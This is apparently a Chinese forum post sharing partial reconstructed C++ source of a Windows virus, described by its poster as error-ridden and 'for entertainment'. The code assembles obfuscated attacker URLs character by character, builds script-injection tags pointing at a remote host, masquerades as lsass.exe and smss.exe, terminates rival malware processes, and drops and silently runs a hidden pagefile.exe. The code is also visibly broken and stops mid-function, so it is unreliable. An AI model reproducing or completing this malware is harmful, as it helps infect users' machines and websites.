1."一部分"是指很无用处的一部分(大家可以具体看代码).
2.代码里边有不少的错误,以及缺失,大家只可当娱乐.
2.放出来只为娱乐或者虚荣,不为技术.因为这里边没有什么技术.
3.不要用于非法用途.
代码如下:
代码:
//complaint for NewNote1. char OrgPath[256];//seems 6d0? char aHttp[]="http:////"; char aMsctfime[]="MSCTFIME "; char aSmss[]="SMSS"; char aMci[]="MCI"; char aProgram[]=" Program"; char aCom[]=" Com"; char aApplication[]=" Application";//? maybe now array just constant. char* pNull=NULL;//40e110 CString strWindowName;//?char buffer CString strWebSite1; CString strWebSite2; CString strNewLsaPath; char aNewLsaPath[255]; class CVirDlg:public CDialog { public: CString m_strWebSite2;//[esi+A8C] CString m_strWebSite3;//[esi+A98] CString m_strTemp1;//[esi+A74] CString m_strScript1;//[esi+A59] CString m_strScript11;//[esi+A5D] CString m_strExe;//[esi+A49] CString m_strLsass;//[esi+A4D] CString m_strSmss;//[esi+A51] CString m_strTemp2;//[esi+A2C] DWORD m_dwTemp;//[esi+60] char m_ModuleName[0x68];//[esi+68] DOWRD m_dwTemp1;//[esi+A30] CString m_strCmdLine;//[esi+A45] } BOOL CVirDlg::OnInitDialog() { SetPriorityClass(GetCurrentProcess(),IDLE_PRIORITY_CLASS); CoInitialize(NULL); CString strTemp; char aEspPifName[256];//ebp-9dc srand((unsigned)time(NULL)); CDialog::OnInitDialog();//here invoke the baseclass memeber function. SendMessage(m_hWnd,WM_SETICON,ICON_BIG,m_hIcon);//SetIcon(m_hIcon,TRUE) SendMessage(m_hWnd,WM_SETICON,ICON_SMALL,m_hIcon);//SetIcon(m_hIcon,FALSE) .m_hIcon is a handle of CVirDlg. strcpy(OrgPath,*__p__agrv()); strTemp.Format("%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c",'w','.','c','0','m','o','.','c','o','m','//','r','.','h','t','m'); strTemp=aHttp+strTemp; strWebSite1=strTemp; strTemp.Format("%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c",'j','s','.','k','0','1','0','2','.','c','o','m','//','a'\ 'd','.','a','s','p','.','h','t','m'); strTemp=aHttp+strTemp; strWebSite2=strTemp; m_strWebSite2=strTemp; strTemp.Format("%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c",'j','s','.','k','0','1','0','2','.','c','o','m','/','g','o',\ '.','a','s','p','.','a','d','.','a','s','p'); strTemp=aHttp+strTemp; m_strWebSite3=strTemp; strWindowName=aMsctfime; strWindowName+=aSmss; m_strTemp1=NULL; strTemp=aMci; strTemp+=aProgram; strTemp+=aCom; strTemp+=aApplication; if(CWnd::FromHandle(FindWindow("XOR",strWindowName))) { DWORD dwPid1=0; GetWindowThreadProcessId(FindWindowEx(0,0,"XOR",strWindowName),&dwPid1); DWORD dwPid2=0; GetWindowThreadProcessId(FindWindowEx(0,0,"#32770",strTemp),&dwPid2); int dwTimes=0; do { if(FindWindow("XOR",strWindowName)) { HANDLE hVirProc; if(hVirProc=OpenProcess(PROCESS_ALL_ACCESS,0,dwPid1) Terminate(hVirProc); else CloseHandle(hVirProc); if(hVirProc=OpenProcess(PROCESS_ALL_ACCESS,0,dwPid2) Terminate(hVirProc); else CloseHandle(hVirProc); } }while(++dwTimes!=5) //?why terminate the vir proc strWindowName="http:\/\/%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D\/%30%31%2E%61%73%70"; strTemp="<script src=\\""+strWindowName+"\"><\/script>"; m_strScript1=strTemp; strTemp="<ScRiPt src=\'"+strWindowName+"\'><\/sCrIpT>"; m_strScript11=strTemp; strTemp.Format("%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c",'M','C','I',' ','P','r',\ 'o','g','r','a','m',' ','C','o','m',' ','A','p','p','l','i','c','a','t','i','o','n'); strWindowName=strTemp;//40d924. strTemp.Format("%c%c%c%c",'~','.','e','x','e'); m_strExe=strTemp; strTemp.Format("%c%c%c%c%c%c%c%c%c",'l','s','a','s','s','.','e','x','e'); m_strLsass=strTemp; strTemp.Format("%c%c%c%c%c%c%c%",'s','m','s','s','.','e','x','e'); m_strSmss=strTemp; SetWindowText(strWindowName); m_strTemp2=pNull; m_dwTemp=0; m_dwTemp1=0; GetModuleFileName(NULL,&m_ModuleName,0x9c4);//ModuleName is the full path name. _stat stInfo; _stat(&m_ModuleName,&stInfo);//get module startup information. char aSysDir[255]; GetSystemDirectory(aSysDir,255); strNewLsaPath.Format("%s\\com",aSysDir); strNewLsaPath.Format("%s%s",strNewFilePath,m_strLsass); strcpy(aNewLsaPath,strNewLsaPath); CString strOrgPath=OrgPath; strOrgPath.MakeLower(); m_strCmdLine=GetCommandLine();//include "" semilicon. m_strCmdLine.MakeLower(); if((int nPos=m_strCmdLine.Find("\""))!=-1) { m_strCmdLine+=" "; m_strCmdLine=m_strCmdLine.Mid(m_strCmdLine.Find("\"",++nPos)+1);//blank space? CString strMutex=strOrgPath+m_strCmdLine;//add one blank space. strMutex.Replace("\\"," "); strMutex.Replace(":"," "); strMutex.Replace("."," "); HANDLE hMutex=CreateMutex(NULL,TURE,strMutex); if(GetLastError()=ERROR_ALREADY_EXIST) exit(0); int nTimes=0; if(_mbscmp(" ^",m_strCmdLine.Left(2))!=-1) //code page.a lot of other things. { SetFileAttributes(m_strCmdLine.Mid(2),HIDDEN|SYSTEM);//? do { if(DeleteFile(m_strCmdLine.Mid(2))!=-1) Sleep(60); else eixt(0); }while(++nTimes<30); exit(0); } if(strOrgPath.Find("pagefile.pif")!=-1) //strOrgPath ebp-2c { CString strRootFile=strOrgPath.Left(3); strRootFile=strRootFile+"pagefile.exe";//strRootFile ebp-20 ThrowVirus(strRootFile,0xc1,"sexp");//throw out the new virus file. SetFileAttributes(strRootFile,HIDDEN|SYSTEM); WinExec(strRootFile,SW_HIDE);//pagefile.exe---invoke the COM component. fun(strRootFile);